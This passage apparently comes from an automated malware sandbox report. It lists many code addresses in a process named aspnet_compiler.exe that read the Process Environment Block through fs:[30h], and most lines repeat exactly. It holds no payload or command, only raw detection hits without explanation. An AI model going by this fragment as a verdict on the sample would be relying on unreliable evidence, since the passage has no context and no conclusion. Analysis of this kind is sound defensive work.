                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B909C mov eax, dword ptr fs:[00000030h]12_2_017B909C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AD090 mov eax, dword ptr fs:[00000030h]12_2_017AD090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AD090 mov eax, dword ptr fs:[00000030h]12_2_017AD090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01785096 mov eax, dword ptr fs:[00000030h]12_2_01785096
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178208A mov eax, dword ptr fs:[00000030h]12_2_0178208A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177D08D mov eax, dword ptr fs:[00000030h]12_2_0177D08D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01787370 mov eax, dword ptr fs:[00000030h]12_2_01787370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01787370 mov eax, dword ptr fs:[00000030h]12_2_01787370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01787370 mov eax, dword ptr fs:[00000030h]12_2_01787370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0185539D mov eax, dword ptr fs:[00000030h]12_2_0185539D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779353 mov eax, dword ptr fs:[00000030h]12_2_01779353
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779353 mov eax, dword ptr fs:[00000030h]12_2_01779353
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177D34C mov eax, dword ptr fs:[00000030h]12_2_0177D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177D34C mov eax, dword ptr fs:[00000030h]12_2_0177D34C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01777330 mov eax, dword ptr fs:[00000030h]12_2_01777330
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183C3CD mov eax, dword ptr fs:[00000030h]12_2_0183C3CD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AF32A mov eax, dword ptr fs:[00000030h]12_2_017AF32A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183B3D0 mov ecx, dword ptr fs:[00000030h]12_2_0183B3D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183F3E6 mov eax, dword ptr fs:[00000030h]12_2_0183F3E6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177C310 mov ecx, dword ptr fs:[00000030h]12_2_0177C310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A0310 mov ecx, dword ptr fs:[00000030h]12_2_017A0310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BA30B mov eax, dword ptr fs:[00000030h]12_2_017BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BA30B mov eax, dword ptr fs:[00000030h]12_2_017BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017BA30B mov eax, dword ptr fs:[00000030h]12_2_017BA30B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018553FC mov eax, dword ptr fs:[00000030h]12_2_018553FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B63FF mov eax, dword ptr fs:[00000030h]12_2_017B63FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E3F0 mov eax, dword ptr fs:[00000030h]12_2_0179E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E3F0 mov eax, dword ptr fs:[00000030h]12_2_0179E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0179E3F0 mov eax, dword ptr fs:[00000030h]12_2_0179E3F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180930B mov eax, dword ptr fs:[00000030h]12_2_0180930B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180930B mov eax, dword ptr fs:[00000030h]12_2_0180930B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180930B mov eax, dword ptr fs:[00000030h]12_2_0180930B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017903E9 mov eax, dword ptr fs:[00000030h]12_2_017903E9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184132D mov eax, dword ptr fs:[00000030h]12_2_0184132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184132D mov eax, dword ptr fs:[00000030h]12_2_0184132D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A3C0 mov eax, dword ptr fs:[00000030h]12_2_0178A3C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017883C0 mov eax, dword ptr fs:[00000030h]12_2_017883C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855341 mov eax, dword ptr fs:[00000030h]12_2_01855341
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01802349 mov eax, dword ptr fs:[00000030h]12_2_01802349
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184A352 mov eax, dword ptr fs:[00000030h]12_2_0184A352
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B33A0 mov eax, dword ptr fs:[00000030h]12_2_017B33A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B33A0 mov eax, dword ptr fs:[00000030h]12_2_017B33A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov ecx, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0180035C mov eax, dword ptr fs:[00000030h]12_2_0180035C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A33A5 mov eax, dword ptr fs:[00000030h]12_2_017A33A5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01778397 mov eax, dword ptr fs:[00000030h]12_2_01778397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01778397 mov eax, dword ptr fs:[00000030h]12_2_01778397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01778397 mov eax, dword ptr fs:[00000030h]12_2_01778397
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183F367 mov eax, dword ptr fs:[00000030h]12_2_0183F367
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017D739A mov eax, dword ptr fs:[00000030h]12_2_017D739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017D739A mov eax, dword ptr fs:[00000030h]12_2_017D739A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A438F mov eax, dword ptr fs:[00000030h]12_2_017A438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A438F mov eax, dword ptr fs:[00000030h]12_2_017A438F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0182437C mov eax, dword ptr fs:[00000030h]12_2_0182437C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177E388 mov eax, dword ptr fs:[00000030h]12_2_0177E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177E388 mov eax, dword ptr fs:[00000030h]12_2_0177E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177E388 mov eax, dword ptr fs:[00000030h]12_2_0177E388
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01800283 mov eax, dword ptr fs:[00000030h]12_2_01800283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01800283 mov eax, dword ptr fs:[00000030h]12_2_01800283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01800283 mov eax, dword ptr fs:[00000030h]12_2_01800283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855283 mov eax, dword ptr fs:[00000030h]12_2_01855283
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C1270 mov eax, dword ptr fs:[00000030h]12_2_017C1270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C1270 mov eax, dword ptr fs:[00000030h]12_2_017C1270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A9274 mov eax, dword ptr fs:[00000030h]12_2_017A9274
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01784260 mov eax, dword ptr fs:[00000030h]12_2_01784260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01784260 mov eax, dword ptr fs:[00000030h]12_2_01784260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01784260 mov eax, dword ptr fs:[00000030h]12_2_01784260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177826B mov eax, dword ptr fs:[00000030h]12_2_0177826B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018172A0 mov eax, dword ptr fs:[00000030h]12_2_018172A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018172A0 mov eax, dword ptr fs:[00000030h]12_2_018172A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018162A0 mov eax, dword ptr fs:[00000030h]12_2_018162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018162A0 mov ecx, dword ptr fs:[00000030h]12_2_018162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018162A0 mov eax, dword ptr fs:[00000030h]12_2_018162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018162A0 mov eax, dword ptr fs:[00000030h]12_2_018162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018162A0 mov eax, dword ptr fs:[00000030h]12_2_018162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018162A0 mov eax, dword ptr fs:[00000030h]12_2_018162A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01786259 mov eax, dword ptr fs:[00000030h]12_2_01786259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018492A6 mov eax, dword ptr fs:[00000030h]12_2_018492A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018492A6 mov eax, dword ptr fs:[00000030h]12_2_018492A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018492A6 mov eax, dword ptr fs:[00000030h]12_2_018492A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018492A6 mov eax, dword ptr fs:[00000030h]12_2_018492A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177A250 mov eax, dword ptr fs:[00000030h]12_2_0177A250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B724D mov eax, dword ptr fs:[00000030h]12_2_017B724D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779240 mov eax, dword ptr fs:[00000030h]12_2_01779240
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01779240 mov eax, dword ptr fs:[00000030h]12_2_01779240
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018092BC mov eax, dword ptr fs:[00000030h]12_2_018092BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018092BC mov eax, dword ptr fs:[00000030h]12_2_018092BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018092BC mov ecx, dword ptr fs:[00000030h]12_2_018092BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018092BC mov ecx, dword ptr fs:[00000030h]12_2_018092BC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177823B mov eax, dword ptr fs:[00000030h]12_2_0177823B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018552E2 mov eax, dword ptr fs:[00000030h]12_2_018552E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_018312ED mov eax, dword ptr fs:[00000030h]12_2_018312ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B7208 mov eax, dword ptr fs:[00000030h]12_2_017B7208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B7208 mov eax, dword ptr fs:[00000030h]12_2_017B7208
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183F2F8 mov eax, dword ptr fs:[00000030h]12_2_0183F2F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017792FF mov eax, dword ptr fs:[00000030h]12_2_017792FF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017902E1 mov eax, dword ptr fs:[00000030h]12_2_017902E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017902E1 mov eax, dword ptr fs:[00000030h]12_2_017902E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017902E1 mov eax, dword ptr fs:[00000030h]12_2_017902E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01855227 mov eax, dword ptr fs:[00000030h]12_2_01855227
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B2D3 mov eax, dword ptr fs:[00000030h]12_2_0177B2D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B2D3 mov eax, dword ptr fs:[00000030h]12_2_0177B2D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0177B2D3 mov eax, dword ptr fs:[00000030h]12_2_0177B2D3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AF2D0 mov eax, dword ptr fs:[00000030h]12_2_017AF2D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AF2D0 mov eax, dword ptr fs:[00000030h]12_2_017AF2D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C0 mov eax, dword ptr fs:[00000030h]12_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C0 mov eax, dword ptr fs:[00000030h]12_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C0 mov eax, dword ptr fs:[00000030h]12_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C0 mov eax, dword ptr fs:[00000030h]12_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C0 mov eax, dword ptr fs:[00000030h]12_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C0 mov eax, dword ptr fs:[00000030h]12_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017AB2C0 mov eax, dword ptr fs:[00000030h]12_2_017AB2C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A2C3 mov eax, dword ptr fs:[00000030h]12_2_0178A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A2C3 mov eax, dword ptr fs:[00000030h]12_2_0178A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A2C3 mov eax, dword ptr fs:[00000030h]12_2_0178A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A2C3 mov eax, dword ptr fs:[00000030h]12_2_0178A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0178A2C3 mov eax, dword ptr fs:[00000030h]12_2_0178A2C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017892C5 mov eax, dword ptr fs:[00000030h]12_2_017892C5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017892C5 mov eax, dword ptr fs:[00000030h]12_2_017892C5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183B256 mov eax, dword ptr fs:[00000030h]12_2_0183B256
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0183B256 mov eax, dword ptr fs:[00000030h]12_2_0183B256
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017902A0 mov eax, dword ptr fs:[00000030h]12_2_017902A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017902A0 mov eax, dword ptr fs:[00000030h]12_2_017902A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017952A0 mov eax, dword ptr fs:[00000030h]12_2_017952A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017952A0 mov eax, dword ptr fs:[00000030h]12_2_017952A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017952A0 mov eax, dword ptr fs:[00000030h]12_2_017952A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017952A0 mov eax, dword ptr fs:[00000030h]12_2_017952A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017B329E mov eax, dword ptr fs:[00000030h]12_2_017B329E
